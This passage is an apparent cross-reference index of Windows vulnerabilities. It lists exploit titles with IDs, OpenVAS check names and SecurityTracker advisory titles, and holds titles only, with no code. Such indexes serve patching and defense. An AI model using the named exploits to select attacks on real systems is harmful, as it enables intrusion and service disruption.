(IGMP v3) Denial of Service Exploit (MS06-007) (2) [1599] MS Windows XP/2003 (IGMP v3) - Denial of Service Exploit (MS06-007) [1584] MS Windows Telephony Service Command Execution Exploit (MS05-040) [1520] MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3) [1506] MS Windows Color Management Module Overflow Exploit (MS05-036) (2) [1505] MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006) [1504] MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta) [1502] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2) [1500] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) [1495] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (3) [1490] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (new) [1488] Microsoft HTML Help Workshop (.hhp file) Denial of Service [1470] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit [1465] MS Windows Services ACLs Local Privilege Escalation Exploit (updated) [1420] MS Windows Metafile (WMF) Remote File Download Exploit Generator [1407] MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055) [1396] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp) [1391] Windows XP/2003 Metafile Escape() Code Execution Exploit (meta) [1377] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl) [1376] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c) [1346] MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053) [1343] MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053) [1341] MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051) [1328] MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit [1287] GO-Global Windows Server <= 3.1.0.3270 Buffer Overflow (PoC) [1286] GO-Global Windows Clients <= 3.1.0.3270 Buffer Overflow (PoC) [1271] MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2) [1269] MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) [1260] MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta) [1198] MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018) [1197] MS Windows (keybd_event) Local Privilege Elevation Exploit [1180] MS Windows Plug-and-Play Service Remote Universal Exploit (french fix) [1179] MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix) [1178] MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit [1149] MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039) [1147] Veritas Backup Exec Remote File Access Exploit (windows) [1146] MS Windows Plug-and-Play Service Remote Overflow (MS05-039) [1143] MS Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit [1128] MS Windows (LegitCheckControl.dll) Genuine Advantage Validation Patch [1116] MS Windows Color Management Module Overflow Exploit (MS05-036) [1104] MS Windows Netman Service Local Denial of Service Exploit [1075] MS Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3) [1065] MS Windows (SMB) Transaction Response Handling Exploit (MS05-011) [1019] MS Windows COM Structured Storage Local Exploit (MS05-012) [1000] MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit [976] MS Windows WINS Vulnerability and OS/SP Scanner [942] MS Windows Malformed IP Options DoS Exploit (MS05-019) [938] MS Windows (HTA) Script Execution Exploit (MS05-016) [909] MS Windows (WINS) Remote Buffer Overflow Exploit (v.3) [861] MS Windows XP/2003 Remote Denial of Service Exploit [749] MS Windows Improper Token Validation Local Exploit (working) [734] MS Windows NetDDE Remote Buffer Overflow Exploit (MS04-031) [733] MS Windows 2000 WINS Remote Code Execution Exploit [721] MS Windows Kernel ANI File Parsing Crash Vulnerability [640] MS Windows Compressed Zipped Folders Exploit (MS04-034) [585] MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030) [584] MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032) [578] MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036) [556] MS Windows JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload [480] MS Windows JPEG GDI+ Remote Heap Overflow Exploit (MS04-028) [478] MS Windows JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028) [475] MS Windows JPEG GDI+ Overflow Administrator Exploit (MS04-028) [474] MS Windows JPEG Processing Buffer Overrun Exploit (MS04-028) [472] MS Windows JPEG GDI+ Overflow Shellcoded Exploit [368] MS Windows XP Task Scheduler (.job) Universal Exploit (MS04-022) [366] MS Windows SMS 2.0 - Denial of Service Exploit [355] MS Windows 2k Utility Manager (All-In-One) Exploit (MS04-019) [353] MS Windows 2K/XP Task Scheduler .job Exploit (MS04-022) [352] MS Windows 2000 Universal Language Utility Manager Exploit (MS04-019) [351] MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020) [350] MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019) [329] MS Windows NT Crash with an Extra Long Username DoS Exploit [295] MS Windows XP/2K Lsasrv.dll Remote Universal Exploit (MS04-011) [293] MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011) [276] MS Windows 2K/XP TCP Connection Reset Remote Attack Tool [275] MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011) [271] MS Windows Utility Manager Local SYSTEM Exploit (MS04-011) [268] MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2) [266] MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit [214] MS Windows (Jolt2.c) Denial of Service Exploit [176] MS Windows IIS SSL Remote Denial of Service Exploit (MS04-011) [163] Eudora 6.0.3 Attachment Spoofing Exploit (windows) [153] MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007) [148] MS Windows XP/2003 Samba Share Resource Exhaustion Exploit [135] MS Windows Messenger Service Remote Exploit FR (MS03-043) [130] MS Windows XP Workstation Service Remote Exploit (MS03-049) [123] MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049) [122] MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045) [119] MS Windows 2000/XP Workstation Service Overflow (MS03-049) [117] MS Windows XP/2000 RPC Remote (non exec memory) Exploit [111] MS Windows Messenger Service Denial of Service Exploit (MS03-043) [109] MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) [103] MS Windows (RPC DCOM2) Remote Exploit (MS03-039) [100] MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) [97] MS Windows (RPC DCOM) Scanner (MS03-039) [92] Microsoft WordPerfect Document Converter Exploit (MS03-036) [86] Real Server 7/8/9 Remote Root Exploit (Windows & Linux) [81] MS Windows 2000 RSVP Server Authority Hijacking PoC Exploit [76] MS Windows (RPC DCOM) Remote Exploit (Universal Targets) [70] MS Windows (RPC DCOM) Remote Exploit (48 Targets) [69] MS Windows RPC DCOM Remote Exploit (18 Targets) [66] MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets) [65] MS Windows SQL Server Denial of Service Remote Exploit (MS03-031) [64] MS Windows (RPC DCOM) Remote Buffer Overflow Exploit [61] MS Windows 2000 RPC DCOM Interface DoS Exploit [56] MS Windows Media Services (nsiislog.dll) Remote Exploit [51] MS Windows WebDav III remote root Exploit (xwdav) [48] MS Windows Media Services Remote Exploit (MS03-022) [36] MS Windows WebDav II (New) Remote Root Exploit [35] MS Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit [32] MS Windows XP (explorer.exe) Buffer Overflow Exploit [23] Real Server < 8.0.2 - Remote Exploit (Windows Platforms) [20] MS Windows SMB Authentication Remote Exploit [5] MS Windows RPC Locator Service Remote Exploit [2] MS Windows WebDAV Remote PoC Exploit [1] MS Windows WebDAV (ntdll.dll) Remote Exploit OpenVAS (Nessus) - http://www.openvas.org: [901301] Microsoft Windows Kerberos Denial of Service Vulnerability (2743555) [903041] Microsoft Windows Kernel Privilege Elevation Vulnerability (2724197) [903036] Microsoft Windows Networking Components Remote Code Execution Vulnerabilities (2733594) [903035] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2731847) [903033] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2718523) [902936] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2783534) [902933] Microsoft Windows Shell Remote Code Execution Vulnerabilities (2727528) [902916] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167) [902909] Microsoft Windows Service Pack Missing Multiple Vulnerabilities [902908] Microsoft Windows DirectWrite Denial of Service Vulnerability (2665364) [902906] Microsoft Windows DNS Server Denial of Service Vulnerability (2647170) [902900] Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584) [902846] Microsoft Windows TLS Protocol Information Disclosure Vulnerability (2655992) [902845] Microsoft Windows Shell Remote Code Execution Vulnerability (2691442) [902829] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258) [902807] Microsoft Windows Media Could Allow Remote Code Execution Vulnerabilities (2636391) [902784] Microsoft Windows Object Packager Remote Code Execution Vulnerability (2603381) [902783] Microsoft Windows Kernel Security Feature Bypass Vulnerability (2644615) [902782] MicroSoft Windows Server Service Remote Code Execution Vulnerability (921883) [902766] Microsoft Windows Kernel Privilege Elevation Vulnerability (2633171) [902694] Microsoft Windows IIS FTP Service Information Disclosure Vulnerability (2761226) [902693] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2761226) [902687] Microsoft Windows Data Access Components Remote Code Execution Vulnerability (2698365) [902677] Microsoft Windows Prtition Manager Privilege Elevation Vulnerability (2690533) [902676] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (2688338) [902609] Microsoft Windows CSRSS Privilege Escalation Vulnerabilities (2507938) [902598] Microsoft Windows Time Component Remote Code Execution Vulnerability (2618451) [902597] Microsoft Windows Media Remote Code Execution Vulnerability (2648048) [902596] Microsoft Windows OLE Remote Code Execution Vulnerability (2624667) [902588] Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability [902566] Microsoft Windows WINS Local Privilege Escalation Vulnerability (2571621) [902516] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902484] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (2588516) [902463] Microsoft Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2567680) [902440] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2536275) [902425] Microsoft Windows SMB Accessible Shares [902403] Microsoft Windows Fraudulent Digital Certificates Spoofing Vulnerability [902377] Microsoft Windows OLE Automation Remote Code Execution Vulnerability (2476490) [902337] Microsoft Windows Kernel Elevation of Privilege Vulnerability (2393802) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [902289] Microsoft Windows LSASS Privilege Escalation Vulnerability (2478960) [902288] Microsoft Kerberos Privilege Escalation Vulnerabilities (2496930) [902281] Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910) [902280] Microsoft Windows BranchCache Remote Code Execution Vulnerability (2385678) [902277] Microsoft Windows Netlogon Service Denial of Service Vulnerability (2207559) [902276] Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420) [902269] Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468) [902263] Microsoft Windows Media Player Network Sharing Remote Code Execution Vulnerability (2281679) [902262] Microsoft Windows Shell and WordPad COM Validation Vulnerability (2405882) [902256] Microsoft Windows win32k.sys Driver 'CreateDIBPalette()' BOF Vulnerability [902232] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (978886) [902231] Microsoft Windows Tracing Feature Privilege Elevation Vulnerabilities (982799) [902227] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [902226] Microsoft Windows Shell Remote Code Execution Vulnerability (2286198) [902115] Microsoft Kerberos Denial of Service Vulnerability (977290) [902094] Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) [902093] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (981852) [902067] Microsoft Windows Kernel Mode Drivers Privilege Escalation Vulnerabilities (979559) [902033] Microsoft Windows '.ani' file Denial of Service vulnerability [901305] Microsoft Windows IP-HTTPS Component Security Feature Bypass Vulnerability (2765809) [901304] Microsoft Windows File Handling Component Remote Code Execution Vulnerability (2758857) [901212] Microsoft Windows DirectPlay Remote Code Execution Vulnerability (2770660) [901211] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2720573) [901209] Microsoft Windows Media Center Remote Code Execution Vulnerabilities (2604926) [901205] Microsoft Windows Components Remote Code Execution Vulnerabilities (2570947) [901193] Microsoft Windows Media Remote Code Execution Vulnerabilities (2510030) [901169] Microsoft Windows Address Book Remote Code Execution Vulnerability (2423089) [901164] Microsoft Windows SChannel Denial of Service Vulnerability (2207566) [901163] Microsoft Windows Media Player Remote Code Execution Vulnerability (2378111)) [901150] Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability(2347290) [901140] Microsoft Windows SMB Code Execution and DoS Vulnerabilities (982214) [901119] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (980218) [901102] Microsoft Windows Media Services Remote Code Execution Vulnerability (980858) [901065] Microsoft Windows IAS Remote Code Execution Vulnerability (974318) [901064] Microsoft Windows ADFS Remote Code Execution Vulnerability (971726) [901063] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [901012] Microsoft Windows Media Format Remote Code Execution Vulnerability (973812) [900965] Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability [900963] Microsoft Windows Kernel Privilege Escalation Vulnerability (971486) [900957] Microsoft Windows Patterns & Practices EntLib DOS Vulnerability [900956] Microsoft Windows Patterns & Practices EntLib Version Detection [900908] Microsoft Windows Message Queuing Privilege Escalation Vulnerability (971032) [900907] Microsoft Windows AVI Media File Parsing Vulnerabilities (971557) [900886] Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (969947) [900881] Microsoft Windows Indexing Service ActiveX Vulnerability (969059) [900880] Microsoft Windows ATL COM Initialization Code Execution Vulnerability (973525) [900879] Microsoft Windows Media Player ASF Heap Overflow Vulnerability (974112) [900877] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [900876] Microsoft Windows CryptoAPI X.509 Spoofing Vulnerabilities (974571) [900873] Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness (971888) [900838] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (967723) [900814] Microsoft Windows WINS Remote Code Execution Vulnerability (969883) [900757] Microsoft Windows Media Player '.AVI' File DOS Vulnerability [900740] Microsoft Windows Kernel Could Allow Elevation of Privilege (977165) [900568] Microsoft Windows Search Script Execution Vulnerability (963093) [900465] Microsoft Windows DNS Memory Corruption Vulnerability - Mar09 [900404] Microsoft Windows RTCP Unspecified Remote DoS Vulnerability [900336] Microsoft Windows Media Player MID File Integer Overflow Vulnerability [900297] Microsoft Windows Kernel Denial of Service Vulnerability (2556532) [900296] Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) [900295] Microsoft Windows DNS Server Remote Code Execution Vulnerability (2562485) [900281] Microsoft IE Developer Tools WMITools and Windows Messenger ActiveX Control Vulnerability (2508272) [900280] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2508429) [900266] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (2424434) [900263] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (2296199) [900248] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (981997) [900241] Microsoft Outlook Express and Windows Mail Remote Code Execution Vulnerability (978542) [900240] Microsoft Exchange and Windows SMTP Service Denial of Service Vulnerability (981832) [900237] Microsoft Windows Authentication Verification Remote Code Execution Vulnerability (981210) [900236] Microsoft Windows Kernel Could Allow Elevation of Privilege (979683) [900235] Microsoft Windows Media Player Could Allow Remote Code Execution (979402) [900232] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561) [900230] Microsoft Windows SMB Server Multiple Vulnerabilities (971468) [900227] Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) [900178] Microsoft Windows 'UnhookWindowsHookEx' Local DoS Vulnerability [900173] Microsoft Windows Media Player Version Detection [900172] Microsoft Windows Media Player 'MIDI' or 'DAT' File DoS Vulnerability [900108] Microsoft Windows NSlookup.exe Remote Code Execution Vulnerability [803007] Microsoft Windows Minimum Certificate Key Length Spoofing Vulnerability (2661254) [802888] Microsoft Windows Media Service Handshake Sequence DoS Vulnerability [802634] Microsoft Windows Unauthorized Digital Certificates Spoofing Vulnerability (2718704) [802500] Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability [802426] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2647518) [802383] Microsoft Windows Color Control Panel Privilege Escalation Vulnerability [802379] Microsoft Windows Kernel 'win32k.sys' Memory Corruption Vulnerability [802260] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [802140] Microsoft Explorer HTTPS Sessions Multiple Vulnerabilities (Windows) [802136] Microsoft Windows Insecure Library Loading Vulnerability (2269637) [801991] Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability [801966] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937) [801914] Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability [801719] Microsoft Windows CSRSS CSRFinalizeContext Local Privilege Escalation Vulnerability (930178) [801718] Microsoft Windows Vista Information Disclosure Vulnerability (931213) [801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [801716] Microsoft Outlook Express/Windows Mail MHTML URI Handler Information Disclosure Vulnerability (929123) [801713] Microsoft Outlook Express And Windows Mail NNTP Protocol Heap Buffer Overflow Vulnerability (941202) [801706] Microsoft Windows TCP/IP Remote Code Execution Vulnerabilities (941644) [801705] Microsoft Windows TCP/IP Denial of Service Vulnerability (946456) [801701] Microsoft Windows DNS Client Service Response Spoofing Vulnerability (945553) [801669] Microsoft Windows IIS FTP Server DOS Vulnerability [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability [801580] Microsoft Windows Fax Cover Page Editor BOF Vulnerabilities [801527] Microsoft Windows 32-bit Platforms Unspecified vulnerabilities [801487] Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693) [801486] Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability (950760) [801484] Microsoft Windows IPsec Policy Processing Information Disclosure Vulnerability (953733) [801483] Microsoft Windows Search Remote Code Execution Vulnerability (959349) [801482] Microsoft Windows ASP.NET Denial of Service Vulnerability(970957) [801479] Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145) [801457] Microsoft Windows Address Book Insecure Library Loading Vulnerability [801456] Microsoft Windows Progman Group Converter Insecure Library Loading Vulnerability [801333] Microsoft Windows Kernel 'win32k.sys' Multiple DOS Vulnerabilities [801090] Microsoft Windows Indeo Codec Multiple Vulnerabilities [800862] Microsoft Windows Kernel win32k.sys Privilege Escalation Vulnerability [800687] Microsoft Windows Server 2003 OpenType Font Engine DoS Vulnerability [800577] Microsoft Windows Server 2003 win32k.sys DoS Vulnerability [800504] Microsoft Windows XP SP3 denial of service vulnerability [800480] Microsoft Windows Media Player '.mpg' Buffer Overflow Vulnerability [800466] Microsoft Windows TLS/SSL Spoofing Vulnerability (977377) [800442] Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability [800332] Microsoft Windows Live Messenger Information Disclosure Vulnerability [800331] Microsoft Windows Live Messenger Client Version Detection [800328] Integer Overflow vulnerability in Microsoft Windows Media Player [800310] Microsoft Windows Media Services nskey.dll ActiveX BOF Vulnerability [800023] Microsoft Windows Image Color Management System Code Execution Vulnerability (952954) [102059] Microsoft Windows Vector Markup Language Buffer Overflow (938127) [102055] Microsoft Windows GDI Multiple Vulnerabilities (925902) [102053] Microsoft Windows Vector Markup Language Vulnerabilities (929969) [100624] Microsoft Windows SMTP Server DNS spoofing vulnerability [100596] Microsoft Windows SMTP Server MX Record Denial of Service Vulnerability [100283] Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability [90024] Windows Vulnerability in Microsoft Jet Database Engine SecurityTracker - https://www.securitytracker.com: [1023566] Microsoft Windows Kerberos Ticket-Granting-Ticket Processing Flaw Lets Remote Authenticated Users Deny Service [1014642] Microsoft Windows Kerberos and PKINIT Vulnerabilities Allow Denial of Service, Information Disclosure, and Spoofing [1028903] Microsoft Windows Unicode Scripts Processor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1028754] Microsoft Windows Defender Pathname Bug Lets Local Users Gain Elevated Privileges [1028748] Microsoft Windows GDI+ TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1027934] Microsoft Windows Includes Some Invalid TURKTRUST Certificates [1027620] Microsoft Kerberos Null Pointer Dereference Lets Remote Users Deny Service [1027389] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027385] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027384] Microsoft Host Integration Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027383] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027381] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027380] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027114] Microsoft Windows Includes Some Invalid Certificates [1027043] Microsoft Windows Partition Manager Memory Allocation Error Lets Local Users Gain Elevated Privileges [1026905] Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026904] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026903] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026902] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026900] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026899] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026685] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026497] Microsoft Windows ClickOnce Feature Lets Remote Users Execute Arbitrary Code [1026271] Microsoft Windows TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1026167] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026103] Microsoft Windows SSL/TLS Protocol Flaw Lets Remote Users Decryption Sessions [1026041] Microsoft Windows Components DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026037] Microsoft Windows Internet Name Service (WINS) Input Validation Flaw in ECommEndDlg() Lets Local Users Gain Elevated Privileges [1025937] Microsoft Windows DHCPv6 Processing Flaw Lets Remote Denial of Service to RPC Services [1025760] Microsoft Windows Bluetooth Stack Memory Access Error Lets Remote Users Execute Arbitrary Code [1025643] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1025634] Microsoft Windows OLE Automation Underflow Lets Remote Users Execute Arbitrary Code [1025512] Microsoft Windows Internet Name Service Socket Send Exception Handling Bug Lets Remote Users Execute Arbitrary Code [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025312] Microsoft Windows Kernel Bug in AFD.sys Lets Local Users Deny Service [1025248] Microsoft Windows Includes Some Invalid Comodo Certificates [1025048] Windows Kerberos Lets Local Users Gain Elevated Privileges [1024879] Microsoft Windows Internet Connection Signup Wizard May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024877] Microsoft Windows May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024874] Microsoft Windows Task Scheduler Lets Local Users Gain Elevated Privileges [1024441] Microsoft Windows RPC Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1024312] Microsoft Windows Tracing Feature for Services Lets Local Users Gain Elevated Privileges [1024216] Microsoft Windows Shell LNK Shortcut Processing Flaw Lets Users Execute Arbitrary Code [1023571] Microsoft Windows Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023495] Microsoft Internet Explorer and Windows OS Shell Handler URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1022710] Microsoft Windows Internet Name Service (WINS) Buffer Overflows Let Remote Users Execute Arbitrary Code [1022330] Microsoft Windows Bug in SETDESKWALLPAPER and GETDESKWALLPAPER Calls Let Local Users Deny Service [1022047] Microsoft Windows SearchPath Function May Let Remote Users Execute Arbitrary Code [1022044] Microsoft Windows Privilege Separation and Access Control Bugs Let Local Users Gain Elevated Privileges [1021629] Microsoft Windows Guidelines for Disabling AutoRun are Ineffective and May Permit Code Execution [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1020678] Microsoft Windows IPSec Policy May Not Be Enforced in Certain Cases [1020677] Microsoft Windows Event System Bugs Let Remote Authenticated Users Execute Arbitrary Code [1020446] Microsoft Windows AutoRun Bug May Let Users Execute Arbitrary Code [1020006] Microsoft Windows XP 'i2omgmt.sys' Input Validation Flaw Lets Local Users Gain Elevated Privileges [1019165] Microsoft Windows LSASS Lets Local Users Gain Elevated Privileges [1018942] Microsoft Windows DNS Service Insufficent Entropy Lets Remote Users Spoof the DNS Service [1018831] Microsoft Windows ShellExecute() URI Handler Bug Lets Remote Users Execute Arbitrary Commands [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1017901] Microsoft Windows Help File Heap Overflow Lets Remote Users Execute Arbitrary Code [1017827] Microsoft Windows Animated Cursor Bug Lets Remote Users Execute Arbitrary Code [1017736] Microsoft Windows Explorer OLE Parsing Bug Lets Users Deny Service [1017641] Microsoft Windows RichEdit OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017636] Microsoft Windows Defender Integer Overflow in Parsing PDF Files Lets Remote Users Execute Arbitrary Code [1017441] Microsoft Windows Workstation Service Memory Allocation Error in NetrWkstaUserEnum() Lets Remote Users Deny Service [1017369] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Book Files Let Remote Users Execute Arbitrary Code [1017168] Microsoft Windows Kernel GDI Data Structure Processing Bug Lets Local Users Gain Elevated Privileges [1016941] Microsoft Windows Shell Integer Overflow Lets Remote Users Execute Arbitrary Code [1016388] Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications [1016339] Microsoft Windows 'hlink.dll' Buffer Overflow in Processing Hyperlinks Lets Remote Users Execute Arbitrary Code [1016292] Microsoft Windows Buffer Overflow in AOL ART Image Rendering Library Lets Remote Users Execute Arbitrary Code [1016290] Microsoft Windows Buffer Overflow in TCP/IP Stack Lets Remote Users Execute Arbitrary Code [1016286] Microsoft Windows 98 Graphics Rendering Engine Buffer Overflow in Processing WMF Images Lets Remote Users Execute Arbitrary Code [1015898] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Books Lets Remote Users Execute Arbitrary Code [1015897] Microsoft Windows Explorer COM Object Bug Lets Remote Users Execute Arbitrary Code [1015765] Microsoft Windows Services Have Unsafe Default ACLs That Let Remote Authenticated Users Gain Elevated Privileges [1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1015629] Microsoft Windows IGMP Processing Bug Lets Remote Users Deny Service [1015595] Microsoft Windows UPnP/NetBT/SCardSvr/SSDP Services May Be Incorrectly Configured By 3rd Party Applications, Allowing Local Users to Gain Elevated Privileges [1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015453] Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code [1015416] Microsoft Windows Unspecified WMF Rendering Bug Lets Remote Users Execute Arbitrary Code [1015349] Microsoft Windows Internet Explorer May Let Remote Users Obfuscate the Download Dialog Box [1015347] Microsoft Windows 2000 Kernel APC Queue Bug Lets Local Users Gain Elevated Privileges [1015233] Microsoft Windows RPC Service May Let Remote Users Deny Service [1015168] Microsoft Windows Buffer Overflows in Graphics Rendering Engine Lets Remote Users Execute Arbitrary Code [1015049] Microsoft Internet Explorer Drag-and-Drop Timing May Let Remote Users Install Arbitrary Files [1015044] Microsoft Windows Multiple COM Objects Let Remote Users Execute Arbitrary Code [1015042] Microsoft Windows Plug and Play Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Lets Remote Users Execute Arbitrary Code [1015039] Microsoft Windows Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015037] Microsoft Windows Buffer Overflows in MSDTC and COM+ Let Remote Users Execute Arbitrary Code and Local User Gain Elevated Privileges [1015036] Microsoft Windows FTP Client Input Validation Hole Lets Remote Servers Create/Overwrite Files on the Target User's System [1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules [1014640] Microsoft Windows Plug and Play Stack Overflow Lets Remote Users Execute Arbitrary Code [1014639] Microsoft Windows Telephony Service Remote Code Execution or Local Privilege Escalation [1014638] Microsoft Windows Print Spooler Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014498] Microsoft Windows Remote Desktop Protocol Bug Lets Remote Users Deny Service [1014417] Microsoft Windows 